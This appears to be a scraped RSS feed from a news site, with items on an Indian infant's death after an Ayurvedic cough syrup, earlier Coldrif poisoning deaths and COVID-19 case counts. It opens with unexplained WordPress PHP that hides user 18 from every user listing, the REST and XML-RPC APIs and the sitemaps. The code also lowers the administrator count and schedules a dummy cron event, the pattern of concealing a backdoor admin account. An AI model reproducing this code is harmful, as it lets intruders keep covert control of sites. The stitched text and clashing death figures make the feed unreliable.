add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Infant Dies in Madhya Pradesh After Consuming Ayurvedic Cough Syrup appeared first on The Edge Media.
]]>Investigation Underway
Chaurai Sub-Divisional Magistrate Prabhat Mishra confirmed that a case of unnatural death has been filed. Samples of both the syrup and the powder have been sent for laboratory testing, while the child’s viscera has been forwarded to the forensic science laboratory in Jabalpur. Authorities are awaiting the post-mortem report to determine the exact cause of death.
Link to Previous Cough Syrup Deaths
This incident occurred just two weeks after the last reported fatality associated with the consumption of the cough syrup brand Coldrif. Earlier this year, 24 children—21 from Chhindwara, two from Betul, and one from Pandhurna—died of renal failure linked to the same brand. Tests revealed that Coldrif contained 48.6 percent diethylene glycol, a toxic chemical known to cause severe kidney damage.
Arrests Made in the Case
Following the investigation into the Coldrif deaths, authorities arrested Ranganathan Govindan, owner of Tamil Nadu-based Sresen Pharma, which produced the syrup. Dr. Praveen Soni, a government pediatrician from Parasia in Chhindwara, who allegedly prescribed the medicine, was also arrested earlier in October and remains in judicial custody.
Ongoing Health Concerns
The recent death raises new concerns about the safety of both allopathic and Ayurvedic formulations being sold in local markets. Officials have intensified efforts to test medicinal products and ensure stricter quality control to prevent further tragedies.
The post Infant Dies in Madhya Pradesh After Consuming Ayurvedic Cough Syrup appeared first on The Edge Media.
]]>The post COVID-19 Cases Increases Rapidly, Higher Death Rates in Kerala appeared first on The Edge Media.
]]>New Delhi, India’s capital, increased COVID measures for schools last week, while Uttar Pradesh, India’s most populated state, made masks mandatory in public areas in several regions once more. As per health ministry data, officials recorded 2,183 new illnesses on Monday, bringing the total number of infections to more than 43 million.
The post COVID-19 Cases Increases Rapidly, Higher Death Rates in Kerala appeared first on The Edge Media.
]]>The post 861 New Covid-19 Cases Recorded in India in Last 24 Hours appeared first on The Edge Media.
]]>The current cases make up about 0.03% of the entire load, while the COVID-19 recoveries rate remains at 98.76%.
The post 861 New Covid-19 Cases Recorded in India in Last 24 Hours appeared first on The Edge Media.
]]>The post All Indian Adults Eligible For Booster Dose, Vaccines Available From 10 April appeared first on The Edge Media.
]]>“It has been agreed that COVID vaccine precautionary doses will be made accessible to the 18+ demographic group at private immunization centers. Precaution Dose administration to 18+ populace through Private Vaccination Centres would begin on April 10th (Sunday), 2022. Precaution Dosage is available to all who have finished 9 months since the delivery of the second dose. This service will be accessible at all Private Vaccination Centres,” according to a statement published by the Centre.
The post All Indian Adults Eligible For Booster Dose, Vaccines Available From 10 April appeared first on The Edge Media.
]]>The post North-East China Goes Under Complete Lockdown Due To Rising Cases appeared first on The Edge Media.
]]>With the anticipated spread of the stealth Omicron variety, the country’s COVID curve is growing dramatically this time. China just reported its second virus-related fatality in over a year.
The post North-East China Goes Under Complete Lockdown Due To Rising Cases appeared first on The Edge Media.
]]>The post China Goes Under Lockdown After 2 Years Due To Massive Outbreak appeared first on The Edge Media.
]]>According to an article in the South China Morning Post, some provincial health officials have ascribed the increase in cases in China to the Omicron strain, which is highly infectious but exhibits less serious symptoms than the initial Covid-19 virus.
The post China Goes Under Lockdown After 2 Years Due To Massive Outbreak appeared first on The Edge Media.
]]>The post Covid: India’s new case tally falls below 20,000 for the first time in two days, with recoveries reaching new highs appeared first on The Edge Media.
]]>The recovery rate now stands at 97.83 percent, the highest since March 2020, with 28,178 patients cured within the same period.
At the time of writing, there were 2,82,520 active cases, accounting for 0.84 percent of the total cases (337,16,451) reported in the country since the epidemic began last year. The number of ongoing cases has also dropped to its lowest level since March 2020.
The post Covid: India’s new case tally falls below 20,000 for the first time in two days, with recoveries reaching new highs appeared first on The Edge Media.
]]>The post India reports less than 30,000 new infections and 291 fatalities in 24 hours, despite a drop in COVID-19 cases appeared first on The Edge Media.
]]>
For the second day in a row, India saw a dramatic decrease in daily new instances of COVID-19 infections. India reported a single-day increase of 27,254 coronavirus infections, bringing the total to 33,264,175, according to the Union Health and Family Welfare Ministry.
Kerala had 20,240 COVID-19 cases and 67 deaths out of 27,254 new COVID-19 cases and 219 deaths reported in India in the last 24 hours, according to the Health Ministry.
Active cases of COVID-19 infections decreased by about 10,652 throughout this time, to 3,74,269 currently. According to data posted at 8 a.m., the COVID-19-related death toll has risen to 44,28, 74, with 219 daily fatalities reported on Monday.
The post India reports less than 30,000 new infections and 291 fatalities in 24 hours, despite a drop in COVID-19 cases appeared first on The Edge Media.
]]>The post As the festival season approaches, Prime Minister Modi has a high-level discussion on Covid and vaccines appeared first on The Edge Media.
]]>With the country’s festive season beginning with a muted Ganesh Chaturthi celebration, Prime Minister Narendra Modi convened a high-level conference on Friday to assess the current Covid-19 situation and immunization progress.
Despite the fear of a third wave of the pandemic, India has reached a milestone of 72.37 crore people vaccinated as of Friday morning. With a weekly positive rate of 2.31 percent, the Covid situation is likewise under control.
According to data from India’s health ministry, more than half of the country’s adult population has received at least one dose of the vaccine, with 18% receiving both doses.
Kerala and Maharashtra continue to add the most Covid cases every day. According to health ministry data, at least 35 districts in India continue to record a weekly Covid positive rate of over 10%, with another 30 districts reporting a rate of five to ten percent.
The post As the festival season approaches, Prime Minister Modi has a high-level discussion on Covid and vaccines appeared first on The Edge Media.
]]>The post In the last 24 hours, India has reported 43,263 new cases appeared first on The Edge Media.
]]>
India reported 43,263 new Covid-19 cases in the last 24 hours on Thursday. According to data updated at 9 a.m. by the Union health ministry, the country’s total coronavirus tally has risen to 3,31,39,981.
Kerala reported 30,196 new cases in the last 24 hours, accounting for nearly half of all new cases. With 338 more deaths in the last 24 hours, the death toll has risen to 4,41,749 people. In the last 24 hours, there have been 2,358 new active cases. The active caseload is 3,93,614, or 1.19 percent of the total number of cases.
The post In the last 24 hours, India has reported 43,263 new cases appeared first on The Edge Media.
]]>